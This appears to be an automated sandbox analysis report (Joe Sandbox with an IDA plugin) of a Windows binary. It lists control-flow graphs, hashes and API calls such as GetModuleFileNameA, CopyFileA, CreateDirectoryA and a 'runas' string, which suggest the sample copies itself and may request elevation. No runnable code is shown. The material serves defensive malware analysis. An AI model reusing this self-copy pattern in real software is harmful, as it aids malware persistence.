                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                            • String ID: H
                            • API String ID: 4237864984-2852464175
                            • Opcode ID: f123762d269f9d5e506690d5ab9080b6749f263ba1c8e7ec78f4b04497fca4f3
                            • Instruction ID: ef09f1b1838666de1952d9572051a51ff39a187ec6572c2e53c015b9deb36ee5
                            • Opcode Fuzzy Hash: f123762d269f9d5e506690d5ab9080b6749f263ba1c8e7ec78f4b04497fca4f3
                            • Instruction Fuzzy Hash: 83A12632A002498FDF29EF7CD851BAE7BB5AF0A328F14015DF811AB391CB359812CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 81 1369c30-1369cba call 1375ac0 call 1362ce0 GetTempPathA 86 1369cc0-1369cc5 81->86 86->86 87 1369cc7-1369d5b call 1375e20 call 1375f70 86->87 93 1369d8c-1369e02 call 1375ac0 call 1362ce0 call 13762f0 call 1375f70 87->93 94 1369d5d-1369d6c 87->94 116 1369e04-1369e13 93->116 117 1369e33-1369e5b 93->117 95 1369d82-1369d89 call 1377684 94->95 96 1369d6e-1369d7c 94->96 95->93 96->95 98 136a181 call 137bcdc 96->98 105 136a186 98->105 107 136a18b-136a1b8 call 13759a0 * 2 CopyFileA call 1365120 105->107 108 136a186 call 137bcdc 105->108 129 136a1ba-136a201 call 1375a80 call 1375ac0 call 1375a80 call 1363b10 107->129 130 136a209-136a20b call 137aa9f 107->130 108->107 119 1369e15-1369e23 116->119 120 1369e29-1369e30 call 1377684 116->120 121 1369e8c-1369edf GetModuleFileNameA 117->121 122 1369e5d-1369e6c 117->122 119->105 119->120 120->117 123 1369ee0-1369ee5 121->123 126 1369e82-1369e89 call 1377684 122->126 127 1369e6e-1369e7c 122->127 123->123 128 1369ee7-1369f38 call 1375e20 123->128 126->121 127->105 127->126 141 1369f94-1369fb4 call 137ab6c 128->141 142 1369f3a-1369f3d 128->142 171 136a206 129->171 137 136a210-136a215 call 137bcdc 130->137 155 1369fb6-1369fd9 call 137abfa call 137ae87 141->155 156 1369fdc-136a000 call 137ab6c 141->156 146 1369f51-1369f54 142->146 147 1369f3f 142->147 151 1369f56-1369f5a 146->151 152 1369f8a 146->152 150 1369f40-1369f44 147->150 150->151 157 1369f46-1369f4f 150->157 158 1369f83-1369f88 151->158 159 1369f5c-1369f5f 151->159 154 1369f8c-1369f8e 152->154 154->141 161 136a083-136a08c 154->161 155->156 178 136a002-136a00b call 137abfa 156->178 179 136a010-136a06d GetFileAttributesA CreateDirectoryA GetFileAttributesA 156->179 157->146 157->150 158->154 159->152 163 1369f61-1369f67 159->163 167 136a08e-136a099 161->167 168 136a0bf-136a0e3 161->168 163->158 169 1369f69-1369f6c 163->169 175 136a0af-136a0bc call 1377684 167->175 176 136a09b-136a0a9 167->176 172 136a0e5-136a0f0 168->172 173 136a110-136a134 168->173 169->152 177 1369f6e-1369f74 169->177 171->130 181 136a106-136a10d call 1377684 172->181 182 136a0f2-136a100 172->182 184 136a136-136a145 173->184 185 136a165-136a180 call 1377012 173->185 175->168 176->137 176->175 177->158 188 1369f76-1369f79 177->188 178->130 178->161 198 136a077-136a07d 179->198 199 136a06f-136a071 179->199 181->173 182->137 182->181 193 136a147-136a155 184->193 194 136a15b-136a162 call 1377684 184->194 188->152 189 1369f7b-1369f81 188->189 189->152 189->158 193->137 193->194 194->185 198->161 199->107 199->198
                            APIs
                            • GetTempPathA.KERNEL32(00000104,?), ref: 01369C90
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: PathTemp
                            • String ID:
                            • API String ID: 2920410445-0
                            • Opcode ID: 2cc999cd6d3a1f314c4630674d5d107ef7eb35799fcee38747d5dcfe520e0bf4
                            • Instruction ID: e7e08a93e51656703511edde20c35feb7466e38a3d1398be3a458022bd29ef7c
                            • Opcode Fuzzy Hash: 2cc999cd6d3a1f314c4630674d5d107ef7eb35799fcee38747d5dcfe520e0bf4
                            • Instruction Fuzzy Hash: B6A1AFB0900268CBEF24DB28CC447DDBBB9AB45318F4085E8D60967286DB755EC8CF69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 203 1363ff0-1364050 call 13762f0 call 1376070 208 1364052-136405e 203->208 209 136407e-13640fa call 1375ac0 * 2 call 1362ce0 call 1375e20 call 1363b10 203->209 210 1364074-136407b call 1377684 208->210 211 1364060-136406e 208->211 233 13640fc-1364108 209->233 234 1364128-136412e 209->234 210->209 211->210 213 13641b7 call 137bcdc 211->213 219 13641bc-136428a call 137bcdc call 1375ac0 call 1362ce0 call 1376070 call 1375ac0 call 1362ce0 call 1375e20 call 1363b10 213->219 264 13642b4-13642c5 Sleep 219->264 265 136428c-1364298 219->265 236 136411e-1364125 call 1377684 233->236 237 136410a-1364118 233->237 238 1364130-136413c 234->238 239 1364158-1364170 234->239 236->234 237->219 237->236 243 136414e-1364155 call 1377684 238->243 244 136413e-136414c 238->244 245 1364172-136417e 239->245 246 136419a-13641b6 call 1377012 239->246 243->239 244->219 244->243 251 1364190-1364197 call 1377684 245->251 252 1364180-136418e 245->252 251->246 252->219 252->251 268 13642c7-13642d3 264->268 269 13642ef-1364308 call 1377012 264->269 266 13642aa-13642b1 call 1377684 265->266 267 136429a-13642a8 265->267 266->264 267->266 273 1364309 call 137bcdc 267->273 270 13642e5-13642ec call 1377684 268->270 271 13642d5-13642e3 268->271 270->269 271->270 275 136430e-136435f call 137bcdc call 1363740 271->275 273->275 285 1364363-1364370 SetCurrentDirectoryA 275->285 286 1364361 275->286 287 1364372-136437e 285->287 288 136439e-1364458 call 1375ac0 call 1362ce0 call 1375ac0 call 1362ce0 call 1376070 call 1375f70 call 1375ac0 call 1362ce0 call 1375e20 call 1363b10 285->288 286->285 289 1364394-136439b call 1377684 287->289 290 1364380-136438e 287->290 320 1364486-136449e 288->320 321 136445a-1364466 288->321 289->288 290->289 292 1364558 call 137bcdc 290->292 298 136455d call 137bcdc 292->298 302 1364562-1364567 call 137bcdc 298->302 322 13644a0-13644ac 320->322 323 13644cc-13644e4 320->323 324 136447c-1364483 call 1377684 321->324 325 1364468-1364476 321->325 326 13644c2-13644c9 call 1377684 322->326 327 13644ae-13644bc 322->327 328 13644e6-13644f2 323->328 329 136450e-1364514 323->329 324->320 325->298 325->324 326->323 327->298 327->326 332 1364504-136450b call 1377684 328->332 333 13644f4-1364502 328->333 334 1364516-1364522 329->334 335 136453e-1364557 call 1377012 329->335 332->329 333->298 333->332 340 1364534-136453b call 1377684 334->340 341 1364524-1364532 334->341 340->335 341->302 341->340
                            APIs
                            • Sleep.KERNEL32(000003E8), ref: 013642B9
                            • SetCurrentDirectoryA.KERNEL32(00000000,774AE603), ref: 01364364
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: CurrentDirectorySleep
                            • String ID: runas
                            • API String ID: 16921501-4000483414
                            • Opcode ID: 599ca02632fd9d6f8191ed571d625a807cd76d5a66d608a24fe6b82f9963fca2
                            • Instruction ID: b92feb9d1e65161d9ac738195e6632fde6613cc5ce44e357b30a18fa21ea93ff
                            • Opcode Fuzzy Hash: 599ca02632fd9d6f8191ed571d625a807cd76d5a66d608a24fe6b82f9963fca2
                            • Instruction Fuzzy Hash: 29E12671E10245ABDB18EB7CCD4979EBF7AAB5131CF54C25CE401AB3C9DB398A408792
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 346 136a032-136a034 347 136a036-136a04d CreateDirectoryA 346->347 348 136a053-136a06d GetFileAttributesA 346->348 347->348 349 136a077-136a08c 348->349 350 136a06f-136a071 348->350 354 136a08e-136a099 349->354 355 136a0bf-136a0e3 349->355 350->349 351 136a18b-136a1b8 call 13759a0 * 2 CopyFileA call 1365120 350->351 382 136a1ba-136a206 call 1375a80 call 1375ac0 call 1375a80 call 1363b10 351->382 383 136a209-136a20b call 137aa9f 351->383 359 136a0af-136a0bc call 1377684 354->359 360 136a09b-136a0a9 354->360 357 136a0e5-136a0f0 355->357 358 136a110-136a134 355->358 362 136a106-136a10d call 1377684 357->362 363 136a0f2-136a100 357->363 364 136a136-136a145 358->364 365 136a165-136a180 call 1377012 358->365 359->355 360->359 366 136a210-136a215 call 137bcdc 360->366 362->358 363->362 363->366 371 136a147-136a155 364->371 372 136a15b-136a162 call 1377684 364->372 371->366 371->372 372->365 382->383 383->366
                            APIs
                            • CreateDirectoryA.KERNELBASE(?,00000000,?,?,?,?), ref: 0136A04D
                            • GetFileAttributesA.KERNELBASE(?,?,?,?,?), ref: 0136A068
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0136A1A5
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$AttributesCopyCreateDirectory
                            • String ID:
                            • API String ID: 210682061-0
                            • Opcode ID: 600b6d787817cfdcb1712178619355d9f46cb46cd19bb2cc1eba2b76741b2849
                            • Instruction ID: 6a0677f92bbef3fe5fc8b3c67ceae7a189e138f39f895e2ea7c6f2ba4a4523b5
                            • Opcode Fuzzy Hash: 600b6d787817cfdcb1712178619355d9f46cb46cd19bb2cc1eba2b76741b2849
                            • Instruction Fuzzy Hash: CD410BB1A001188FDB24DB2CCC8979CBB78AF55318F5445DCD609B7286DB356AC48F6A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 393 1380a55-1380a6a GetEnvironmentStringsW 394 1380a6c-1380a8d call 1380a1e call 1380971 393->394 395 1380ac5 393->395 394->395 403 1380a8f-1380a90 call 137db3c 394->403 397 1380ac7-1380ac9 395->397 399 1380acb-1380acc FreeEnvironmentStringsW 397->399 400 1380ad2-1380ad8 397->400 399->400 405 1380a95-1380a9a 403->405 406 1380aba 405->406 407 1380a9c-1380ab2 call 1380971 405->407 408 1380abc-1380ac3 call 137d653 406->408 407->406 413 1380ab4-1380ab8 407->413 408->397 413->408
                            APIs
                            • GetEnvironmentStringsW.KERNEL32 ref: 01380A5E
                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 01380ACC
                              • Part of subcall function 01380971: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,01384B40,?,00000000,00000000), ref: 01380A13
                              • Part of subcall function 0137DB3C: RtlAllocateHeap.NTDLL(00000000,?,?,?,01378272,?,?,?,?,?,013620C3,?,?), ref: 0137DB6E
                            • _free.LIBCMT ref: 01380ABD
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
                            • String ID:
                            • API String ID: 2560199156-0
                            • Opcode ID: a538929aa8deaf3b11cef0ab5c2dc06d2cc8769e833ec807439d6d398a479799
                            • Instruction ID: d2614dbb15849a9aab36de4588960b64f2bea58fcc7ec64370e239f444d865d9
                            • Opcode Fuzzy Hash: a538929aa8deaf3b11cef0ab5c2dc06d2cc8769e833ec807439d6d398a479799
                            • Instruction Fuzzy Hash: 0701ACA36013557FF73577BF5C88C7FBD6DCED6A983050229B904D2204FA598D0682B0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 422 1369d04-1369d13 423 1369d15-1369d23 422->423 424 1369d29-1369d5b call 1377684 422->424 423->424 425 136a181 call 137bcdc 423->425 431 1369d8c-1369e02 call 1375ac0 call 1362ce0 call 13762f0 call 1375f70 424->431 432 1369d5d-1369d6c 424->432 430 136a186 425->430 433 136a18b-136a1b8 call 13759a0 * 2 CopyFileA call 1365120 430->433 434 136a186 call 137bcdc 430->434 458 1369e04-1369e13 431->458 459 1369e33-1369e5b 431->459 436 1369d82-1369d89 call 1377684 432->436 437 1369d6e-1369d7c 432->437 452 136a1ba-136a206 call 1375a80 call 1375ac0 call 1375a80 call 1363b10 433->452 453 136a209-136a20b call 137aa9f 433->453 434->433 436->431 437->425 437->436 452->453 457 136a210-136a215 call 137bcdc 453->457 462 1369e15-1369e23 458->462 463 1369e29-1369e30 call 1377684 458->463 465 1369e8c-1369edf GetModuleFileNameA 459->465 466 1369e5d-1369e6c 459->466 462->430 462->463 463->459 467 1369ee0-1369ee5 465->467 471 1369e82-1369e89 call 1377684 466->471 472 1369e6e-1369e7c 466->472 467->467 473 1369ee7-1369f38 call 1375e20 467->473 471->465 472->430 472->471 482 1369f94-1369fb4 call 137ab6c 473->482 483 1369f3a-1369f3d 473->483 493 1369fb6-1369fd9 call 137abfa call 137ae87 482->493 494 1369fdc-136a000 call 137ab6c 482->494 486 1369f51-1369f54 483->486 487 1369f3f 483->487 490 1369f56-1369f5a 486->490 491 1369f8a 486->491 489 1369f40-1369f44 487->489 489->490 495 1369f46-1369f4f 489->495 496 1369f83-1369f88 490->496 497 1369f5c-1369f5f 490->497 492 1369f8c-1369f8e 491->492 492->482 498 136a083-136a08c 492->498 493->494 513 136a002-136a00b call 137abfa 494->513 514 136a010-136a06d GetFileAttributesA CreateDirectoryA GetFileAttributesA 494->514 495->486 495->489 496->492 497->491 500 1369f61-1369f67 497->500 503 136a08e-136a099 498->503 504 136a0bf-136a0e3 498->504 500->496 505 1369f69-1369f6c 500->505 510 136a0af-136a0bc call 1377684 503->510 511 136a09b-136a0a9 503->511 507 136a0e5-136a0f0 504->507 508 136a110-136a134 504->508 505->491 512 1369f6e-1369f74 505->512 516 136a106-136a10d call 1377684 507->516 517 136a0f2-136a100 507->517 519 136a136-136a145 508->519 520 136a165-136a180 call 1377012 508->520 510->504 511->457 511->510 512->496 523 1369f76-1369f79 512->523 513->453 513->498 533 136a077-136a07d 514->533 534 136a06f-136a071 514->534 516->508 517->457 517->516 528 136a147-136a155 519->528 529 136a15b-136a162 call 1377684 519->529 523->491 524 1369f7b-1369f81 523->524 524->491 524->496 528->457 528->529 529->520 533->498 534->433 534->533
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 01369EB5
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0136A1A5
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CopyModuleName
                            • String ID:
                            • API String ID: 4108865673-0
                            • Opcode ID: e0e4bd40b996f9bcb9e025aa3e980526a3748e0ec919d5ff2a19b3be744e4fcc
                            • Instruction ID: 7d5ac960b1d85c464944fd426ecd4854d8687866de289f7d5a59e30d55446e60
                            • Opcode Fuzzy Hash: e0e4bd40b996f9bcb9e025aa3e980526a3748e0ec919d5ff2a19b3be744e4fcc
                            • Instruction Fuzzy Hash: E2C128B1A001148FDB24DB2CCC4479DBB79AB5121CF4482E8D249A7286DB359EC98F65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 538 137c59c-137c5b2 539 137c6bd 538->539 540 137c5b8-137c5d8 538->540 541 137c6c0-137c6c4 539->541 542 137c5de-137c5ea 540->542 543 137c67b-137c6bb call 137a831 * 4 540->543 545 137c5ee-137c5f3 542->545 546 137c5ec 542->546 543->541 547 137c5f5-137c5f7 545->547 548 137c5f8-137c5fa 545->548 546->545 547->548 550 137c5fc-137c600 call 1380e41 548->550 551 137c619-137c637 call 1380e41 call 137d653 548->551 556 137c605-137c617 call 137d653 550->556 551->539 565 137c63d-137c667 551->565 556->551 556->565 565->543 567 137c669-137c66c 565->567 568 137c66e-137c676 567->568 568->568 569 137c678 568->569 569->543
                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free
                            • String ID:
                            • API String ID: 269201875-0
                            • Opcode ID: 3ee90abf8a17f64102b736b442e92c29d7eaa22b83720db3b59f28dbe848fc27
                            • Instruction ID: 4151c16d522139b25980eddba57354ad9c42f2702119ad606bcc7796db2fa36c
                            • Opcode Fuzzy Hash: 3ee90abf8a17f64102b736b442e92c29d7eaa22b83720db3b59f28dbe848fc27
                            • Instruction Fuzzy Hash: 9541B536A00205AFCB24DF6CC880A5EB7B5EF89718F1954A9D915EB341D735FD02CB80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 570 1384d8f-1384d9a 571 1384d9c-1384da5 call 137db3c 570->571 572 1384da7-1384dad 570->572 581 1384dcb-1384dcd 571->581 574 1384db8-1384dbb 572->574 575 1384daf-1384db6 call 137d653 572->575 576 1384dbd-1384dc2 call 137b7f0 574->576 577 1384de2-1384df4 RtlReAllocateHeap 574->577 588 1384dc8 575->588 576->588 582 1384dce-1384dd5 call 137ccd1 577->582 583 1384df6 577->583 582->576 590 1384dd7-1384de0 call 137bd47 582->590 587 1384dca 583->587 587->581 588->587 590->576 590->577
                            APIs
                            • _free.LIBCMT ref: 01384DB0
                              • Part of subcall function 0137DB3C: RtlAllocateHeap.NTDLL(00000000,?,?,?,01378272,?,?,?,?,?,013620C3,?,?), ref: 0137DB6E
                            • RtlReAllocateHeap.NTDLL(00000000,?,?,00000004,00000000,?,01380E8A,?,00000004,00000002,?,?,?,0137C625,?,00000002), ref: 01384DEC
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap$_free
                            • String ID:
                            • API String ID: 1482568997-0
                            • Opcode ID: f1a4e9f0fbd95db3e3d389f5980902afa4dea1f20af59d0d58b1e5bc5fae7e7e
                            • Instruction ID: 12db4ec09f0098de261f1b129ba8da455b372fe7b1e2050e1e951064159631dc
                            • Opcode Fuzzy Hash: f1a4e9f0fbd95db3e3d389f5980902afa4dea1f20af59d0d58b1e5bc5fae7e7e
                            • Instruction Fuzzy Hash: 6AF0BB312403576ADB323F6EAC00F6B7B5C9F9177DF158215FD549AAD2DB34C40581A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 593 137c25d-137c264 594 137c266-137c268 593->594 595 137c269-137c270 call 13806b4 call 1380a55 593->595 599 137c275-137c279 595->599 600 137c280-137c289 call 137c2b0 599->600 601 137c27b-137c27e 599->601 607 137c290-137c297 600->607 608 137c28b-137c28e 600->608 602 137c2a4-137c2af call 137d653 601->602 609 137c29c-137c2a3 call 137d653 607->609 608->609 609->602
                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free
                            • String ID:
                            • API String ID: 269201875-0
                            • Opcode ID: 602728e0406b4f426b94bfa6c66362c231ea77ea04411f015f2870fd83605a7d
                            • Instruction ID: 4ce6127cceaf6516324a0665971aa5e04cec1e8ed08750a8094af0201ef74db9
                            • Opcode Fuzzy Hash: 602728e0406b4f426b94bfa6c66362c231ea77ea04411f015f2870fd83605a7d
                            • Instruction Fuzzy Hash: 1AE0652250555345EF367AFD6C0076927896F9173DF11532AE42CD65C0DF7844418A66
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 612 1375e20-1375e3c 613 1375e64-1375e6a 612->613 614 1375e3e-1375e43 612->614 617 1375e70-1375e7b 613->617 618 1375f4e call 13769f0 613->618 615 1375e47-1375e61 call 1379bb0 614->615 616 1375e45 614->616 616->615 621 1375e84-1375e91 617->621 622 1375e7d-1375e82 617->622 624 1375f53-1375f58 call 1362150 618->624 626 1375e93-1375e98 621->626 627 1375e9a-1375e9f 621->627 625 1375ea2-1375eb6 622->625 629 1375edd-1375edf 625->629 630 1375eb8-1375ebd 625->630 626->625 627->625 631 1375ee1-1375ee2 call 1377403 629->631 632 1375eec 629->632 630->624 634 1375ec3-1375ed0 call 1377403 630->634 638 1375ee7-1375eea 631->638 636 1375eee-1375f11 call 137a270 632->636 642 1375ed2-1375edb 634->642 643 1375f49 call 137bcdc 634->643 645 1375f13-1375f1e 636->645 646 1375f3c-1375f46 636->646 638->636 642->636 643->618 647 1375f32-1375f39 call 1377684 645->647 648 1375f20-1375f2e 645->648 647->646 648->643 649 1375f30 648->649 649->647
                            APIs
                            • Concurrency::cancel_current_task.LIBCPMT ref: 01375F53
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: Concurrency::cancel_current_task
                            • String ID:
                            • API String ID: 118556049-0
                            • Opcode ID: 99a60c00e11d80a0fe42efdd695636690d312d340402f51b068320ab2a9b3208
                            • Instruction ID: dab6ca06767e03fe6e2d9f3b114b9072fe5cdacd3a231128152148b309719a8c
                            • Opcode Fuzzy Hash: 99a60c00e11d80a0fe42efdd695636690d312d340402f51b068320ab2a9b3208
                            • Instruction Fuzzy Hash: 39314871B002048BD73C8E7C98809AEFBE8EF54229B14877EE969C7780D7389D448792
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • ___std_exception_copy.LIBVCRUNTIME ref: 0136218E
                              • Part of subcall function 01378483: RaiseException.KERNEL32(E06D7363,00000001,00000003,0136216C,?,?,?,0136216C,?,01396D1C), ref: 013784E3
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExceptionRaise___std_exception_copy
                            • String ID:
                            • API String ID: 3109751735-0
                            • Opcode ID: ecb855037fc80ce8b9c26a0cb71d89f708995723942670c1a52ed032688b82ed
                            • Instruction ID: 47a316203f6506aa76ec798ce0fb42b407b7edab3222dc20a9bed2ce6c011e62
                            • Opcode Fuzzy Hash: ecb855037fc80ce8b9c26a0cb71d89f708995723942670c1a52ed032688b82ed
                            • Instruction Fuzzy Hash: 470196B580030EA7DB24BBEDDC0999ABBACDE1021CB508575FA14B7640FB74E954C6E1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 674 137d4b1-137d4d7 call 137d287 677 137d530-137d533 674->677 678 137d4d9-137d4eb call 138268f 674->678 680 137d4f0-137d4f5 678->680 680->677 681 137d4f7-137d52f 680->681
                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: __wsopen_s
                            • String ID:
                            • API String ID: 3347428461-0
                            • Opcode ID: 1d21bacbc552e007d8faf7eb33d88b9e870f4373daa2eb88e1600b9551244f7d
